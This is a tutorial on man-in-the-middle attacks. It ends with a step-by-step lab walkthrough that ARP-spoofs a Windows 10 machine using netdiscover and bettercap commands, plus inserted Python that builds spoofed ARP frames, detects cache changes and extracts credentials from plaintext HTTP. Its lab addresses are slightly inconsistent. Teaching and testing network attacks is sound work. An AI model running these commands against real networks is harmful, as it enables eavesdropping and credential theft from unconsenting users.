Introduction and Illustration of the Man-in-the-Middle Attack
Have you ever wondered how the hacker in a spy movie manages to pull specific information out of a particular person without ever being detected?
There are a number of ways to do it. Today we will look at one particular attack that lets us do the same thing, using a technique called "man in the middle" (MITM).
What is a Man-in-the-Middle (MITM) attack?
Although the phrase "man-in-the-middle" is usually associated with attacks, it is first of all a simple and effective way to gather information. It is a general term for any device or host that sits between your computer and the destination you are talking to and relays the traffic between them.
That said, you can imagine what becomes possible when an attacker can place themselves between your data and a destination: stolen personal information, passwords/credentials, financial information, general browsing history, and more. All of these types of information fall under a category that most would refer to as "sensitive information".
How a MITM attack takes place
MITM attacks frequently happen when you are running badly outdated software or are connected to an untrusted network, such as public Wi-Fi. An analogy is useful before we go into how the attack works. Suppose John calls Jane. Nothing seems wrong: John starts the call by telling Jane about his day. Unfortunately, an attacker who has positioned themselves between the two phones has been listening in on the supposedly "safe" call the entire time, so everything about John's day is now known to the attacker. That, quite literally, is the definition of a man-in-the-middle attack.
In more formal terms, a MITM attack begins with reconnaissance. The attacker first observes the victim's outbound traffic (looking for plaintext protocols, weak or missing encryption, and so on) in order to plan the next move. Once on the path, further options include injecting packets into the stream and session hijacking, that is, stealing session cookies in order to impersonate the logged-in user.
The next move is finding a way to "slot" themselves into the path. If they can act as an invisible relay between you and the destination server, they will. On a local network that is typically done by poisoning address resolution (ARP or DNS, covered below); against encrypted connections it means presenting a certificate the victim will accept (for instance a stolen certificate together with its private key) or exploiting weaknesses in old SSL/TLS versions.
Once in place, the attacker effectively has complete control over the intercepted data. They can read it or alter it in transit, for example changing the payee of a transfer so the money goes to the attacker, and collect further personal details (your date of birth, SIN/SSN, and more).
What Makes Man-in-the-Middle Attacks So Dangerous?
MITM attacks are so damaging because the attacker can slip into a network unnoticed, harvest sensitive data and leave before anyone becomes suspicious. A common variant on wireless networks is a rogue access point: devices tend to associate with the strongest signal advertising a known network name, so an inattentive user's laptop or phone joins the bogus SSID and its traffic, passwords included, passes through the attacker. MITM attacks can be detected and stopped, but the attacker still walks away with whatever was already captured.
Companies that suffer MITM attacks lose their customers' trust and have to spend time and money on the cleanup, and the IT department has to answer for how the breach was allowed to happen. A frequently quoted statistic, though one that is hard to trace to a primary source, is that 60% of small businesses hit by a cyberattack go out of business within six months.
Types of Man-in-the-Middle Attacks
Man-in-the-middle (MITM) attacks can be divided into two phases: "interception", getting onto the path so that the victim's packets flow through the attacker, and "decryption", turning any encrypted traffic into something readable. Every MITM attack involves the first; the second is needed whenever the victim's traffic is protected. The techniques below are the common ways of achieving the interception.
ARP Spoofing
In Address Resolution Protocol (ARP) spoofing the attacker links their own MAC address to the IP address of a legitimate host, usually the default gateway. The attacker sends forged ARP messages over the LAN; once the victims update their ARP caches, traffic meant for the legitimate IP address is delivered to the attacker's MAC address instead, and the attacker can forward it on so that nobody notices.
DNS Spoofing
In Domain Name System (DNS) spoofing the attacker corrupts name resolution, by poisoning a resolver's cache or by answering the victim's queries directly, so that a legitimate domain name resolves to a server the attacker controls, hosting a copy of the real site. Unsuspecting users reach the fake page, enter their login details, and hand them straight to the attacker.
IP Spoofing
Computers and devices on a network communicate by exchanging IP packets, each carrying a header with, among other things, a source address. In IP spoofing the attacker forges that source address so that the receiving host believes it is talking to a trusted address when it is really talking to the attacker's software.
HTTPS Spoofing
HTTPS itself makes straightforward interception hard, so attackers instead register domain names that look like well-known sites (for example using characters from other alphabets that render identically in the address bar) and send their targets links to them. The padlock is genuine, but it belongs to the attacker's look-alike domain; once connected to the malicious site, the victim is exposed to credential theft.
SSL Stripping
HTTPS has been one effective mechanism for thwarting MITM attacks, and that gave rise to a newer technique: SSL stripping. The attacker, already on the path, intercepts the victim's request, keeps a normal HTTPS connection open to the server, and serves the victim a downgraded plain HTTP version of the page. The victim sees an unencrypted site, the server sees an ordinary client, and the attacker in between controls the connection and harvests everything that passes through it.
IN THIS ARTICLE, WE WILL BE TALKING ABOUT ARP SPOOFING
LETS GET STARTED
Gathering information is one of the most crucial steps in penetration testing or hacking. When you think about it, a system is very hard to get into if you know nothing about it. For instance, say you are connected to a network and your target is one of the devices on it. Before attacking it you first need to identify every connected client, with its IP address and its MAC address. With that in hand you can learn more about the target or start launching attacks against it. Many programs can do this discovery for you.
To check your own network configuration, run the following command in your Linux terminal:
ifconfig
(On current distributions ifconfig may not be installed; ip addr show gives the same information.) On the lab machine used here it reported the following details:
The network interface : eth0
IP address : 192.168.0.110
MAC Address : 08:00:27:89:f7:4f
Note that these are the details of your own device, not of the network you are going to attack.
To find all the other devices connected to the network, run netdiscover against your subnet, keeping the first three octets of your own address and scanning the whole /24:
netdiscover -r <first three octets of your IP>.0/24
Instead of typing all 254 possible addresses by hand, we append /24 and netdiscover knows we mean every address from 192.168.74.1 up to 192.168.74.254.
The /24 is CIDR notation: the first 24 bits, that is, the first three octets, are the network part, so the notation specifies the whole subnet in one go.
netdiscover -r 192.168.74.1/24
This generates the following output:
It lists every client connected to the same network, together with its IP address and MAC address.
Other tools can perform the same kind of network search, for example Zenmap, the Nmap GUI. Let us look at a pictorial view of the network we are connected to.
Here the yellow dot represents the network gateway, in other words the router that holds the network together.
The green dots represent the devices connected to the network, and the green dot in the middle is our own machine.
Let us look at our target machine, the one whose IP address ends in 134, on which we will perform the attack.
As you can see, our Windows 10 computer has the IP address 192.168.74.134 and is connected to a router with the IP address 192.168.74.2.
Also note that the router's MAC address is shown as 00:50:56:f5:ad:db.
We will be performing our attack on this Windows 10 machine.
Now switch to the Kali machine and start bettercap, which needs root privileges to capture and inject packets:
sudo bettercap -iface eth0
We pass eth0 because that is the interface ifconfig reported earlier.
If you do not know how to use bettercap, typing help lists all the modules and commands it provides.
For example, to see what the net.probe module does, use help followed by the module name: help net.probe
In short, net.probe sends UDP packets to every address in the subnet so that devices reveal themselves and show up in bettercap's host list.
net.probe on turns the module on and net.probe off turns it off.
The help output also lists all the options you can change for the module.
So this is just another, faster way of discovering the connected clients with bettercap.
Our Windows device shows up in the list with the IP 192.168.74.134.
Now to the man-in-the-middle attack itself, which we will carry out with bettercap's arp.spoof module.
To see how this module works we again use the help command: help arp.spoof
It lists a number of options and modes with details of how they work. arp.spoof on turns the module on. arp.ban on goes further and simply cuts the target off the network (it poisons the ARP caches without forwarding anything); it is very simple and you can try it in your own time. arp.spoof off and arp.ban off turn the respective mode back off.
Parameters are set with set [parameter name] [parameter value]. For this attack we need three commands:
set arp.spoof.fullduplex true (spoof both sides, the router as well as the target machine, so that traffic in both directions passes through us)
set arp.spoof.targets 192.168.74.134 (the target to poison; bettercap will only spoof this device)
arp.spoof on (start the module)
These commands poison the target's ARP cache so that it believes the Kali machine is the router: every request the Windows machine sends to the router's IP now goes to the Kali machine first and is forwarded on to the real router, which, because full duplex also poisons the router's cache, thinks it is talking to the original device. Since bettercap forwards the traffic in both directions (it enables IP forwarding when the module starts), the victim keeps its connectivity and nothing looks wrong from the victim's side.
We can now check the target's ARP cache with the arp -a command on the Windows machine and compare it with before.
Notice that the MAC address listed for 192.168.74.2 has changed: it is no longer the router's 00:50:56:f5:ad:db but the Kali machine's eth0 address, so everything the Windows computer sends to the router's IP is now delivered to the Kali machine.
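The frames behind that cache change, as an added example that is not part of the original article and not bettercap's own code: it builds the two ARP replies that full-duplex spoofing keeps re-sending, decodes them back, and performs the arp -a comparison from the text on every frame instead of by hand. The attacker, gateway and victim IPs and the gateway MAC are the ones shown in this write-up; the Windows machine's MAC is not shown anywhere above and is an assumed value.

```python
"""Added example (not from the article or from bettercap): the Ethernet/ARP frames
arp.spoof puts on the wire in full-duplex mode, and the cache-change check that
arp -a performs by hand, applied to every frame. Addresses are the ones in this
write-up except the victim MAC, which the article never shows and is assumed."""
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2

ATTACKER_MAC = "08:00:27:89:f7:4f"   # Kali eth0, from the ifconfig output above
GATEWAY_MAC = "00:50:56:f5:ad:db"    # router, from the Windows arp -a output
GATEWAY_IP = "192.168.74.2"
VICTIM_MAC = "08:00:27:12:34:56"     # assumed: the Windows 10 NIC is not given in the article
VICTIM_IP = "192.168.74.134"


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """42-byte Ethernet + ARP reply. In a spoofed reply sender_ip is the address being
    claimed and sender_mac is the attacker's MAC; the receiver's ARP cache records that
    pairing whether or not it ever asked for it."""
    eth = mac_to_bytes(target_mac) + mac_to_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet/IPv4, 6-byte MAC, 4-byte IP
    arp += mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
    arp += mac_to_bytes(target_mac) + ip_to_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode an ARP-over-IPv4 frame into its fields, or return None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": bytes_to_ip(frame[28:32]),
        "target_mac": bytes_to_mac(frame[32:38]),
        "target_ip": bytes_to_ip(frame[38:42]),
    }


def fullduplex_spoof_frames(attacker_mac, gateway_mac, gateway_ip, victim_mac, victim_ip):
    """The two replies that arp.spoof.fullduplex=true keeps re-sending: the victim is told
    the gateway IP lives at the attacker's MAC, and the gateway is told the victim IP lives
    there too, so both directions of the conversation arrive at the attacker."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def detect_mac_changes(frames):
    """Flag every IP whose claimed MAC changes across the frames, as (ip, old_mac, new_mac).
    This is the arp -a before/after comparison from the text done on every frame; tools
    such as arpwatch alert on the same condition."""
    seen, alerts = {}, []
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in seen and seen[ip] != mac:
            alerts.append((ip, seen[ip], mac))
        seen[ip] = mac
    return alerts


def simulate_attack():
    """Legitimate replies first (the state arp -a shows before the attack), then the spoofed
    pair; returns the alerts a host watching the wire would raise."""
    legit = [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    ]
    spoofed = list(fullduplex_spoof_frames(ATTACKER_MAC, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    return detect_mac_changes(legit + spoofed)


if __name__ == "__main__":
    for ip, old, new in simulate_attack():
        print(f"{ip} moved from {old} to {new}")
```

The second alert, for 192.168.74.134, is what distinguishes full-duplex spoofing from the one-sided variant: the router's cache is poisoned as well, so replies from the Internet also come back through Kali rather than going straight to the victim.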
Likewise, we can capture the data flowing between the router and the target machine with bettercap's net.sniff module, turned on with net.sniff on.
This prints the Windows machine's network activity. For example, if we open google.com in the browser, the sniffer shows the requests being made to google.com. Be aware that for an HTTPS site such as Google only the DNS lookup and the TLS handshake (including the server name) are visible; the request itself stays encrypted. Plain HTTP traffic, by contrast, is shown in full, including any credentials the user submits.
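What the sniffer can and cannot read, as an added example that is not part of the original article and not bettercap's own code: a constructed plaintext HTTP login request is decoded in full, while a constructed TLS ClientHello gives up only the server name (SNI). The host names and the form values are illustrative; a real ClientHello carries many more cipher suites and extensions than the minimal one built here.

```python
"""Added example (not from the article or from bettercap): what an on-path sniffer can
read once the victim's traffic flows through it. A plain HTTP request is fully visible;
for HTTPS only the TLS ClientHello's server name (SNI) is. Both inputs are constructed
here and the host names are illustrative."""
import struct

# Constructed plaintext request, the kind net.sniff prints in full.
HTTP_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Cookie: session=d41d8cd9\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"user=jane&pass=hunter2"
)


def parse_http_request(data):
    """Request line, headers and body of a plaintext HTTP request."""
    head, _, body = data.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "host": headers.get("host"),
            "cookie": headers.get("cookie"), "body": body.decode("latin-1")}


def build_client_hello(server_name):
    """Minimal TLS 1.2 ClientHello carrying only a server_name extension (constructed
    stand-in for what a browser sends when opening an HTTPS site)."""
    name = server_name.encode()
    entry = struct.pack("!BH", 0, len(name)) + name             # name_type host_name(0)
    sni_list = struct.pack("!H", len(entry)) + entry
    ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list   # extension type server_name
    body = (struct.pack("!H", 0x0303) + bytes(32)                # client_version, random
            + b"\x00"                                            # empty session id
            + struct.pack("!H", 2) + b"\xc0\x2f"                 # one cipher suite
            + b"\x01\x00"                                        # null compression
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body    # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record):
    """Walk a TLS record holding a ClientHello and return the SNI host name, or None."""
    if len(record) < 43 or record[0] != 0x16 or record[5] != 0x01:
        return None
    pos = 5 + 4 + 2 + 32                                      # record hdr, handshake hdr, version, random
    pos += 1 + record[pos]                                    # session id
    pos += 2 + struct.unpack("!H", record[pos:pos + 2])[0]    # cipher suites
    pos += 1 + record[pos]                                    # compression methods
    end = pos + 2 + struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= end:
        etype, elen = struct.unpack("!HH", record[pos:pos + 4])
        pos += 4
        if etype == 0x0000:
            lpos = pos + 2                                    # skip server_name_list length
            ntype = record[lpos]
            nlen = struct.unpack("!H", record[lpos + 1:lpos + 3])[0]
            if ntype == 0:
                return record[lpos + 3:lpos + 3 + nlen].decode("ascii")
        pos += elen
    return None


def what_the_sniffer_sees(packet):
    """Summarise the fields an on-path observer can read from a captured payload."""
    if packet[:1] == b"\x16":
        return {"protocol": "TLS", "visible": {"sni": extract_sni(packet)}}
    return {"protocol": "HTTP", "visible": parse_http_request(packet)}


if __name__ == "__main__":
    print(what_the_sniffer_sees(HTTP_REQUEST))
    print(what_the_sniffer_sees(build_client_hello("www.google.com")))
```

Everything in the HTTP dictionary, cookie and password included, is what the attacker gets for free from a plaintext site; for the TLS connection the only thing learned is where the victim went, which is why the SSL stripping technique described earlier exists.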
Hence we have successfully performed an arp spoofing attack on a windows 10 computer.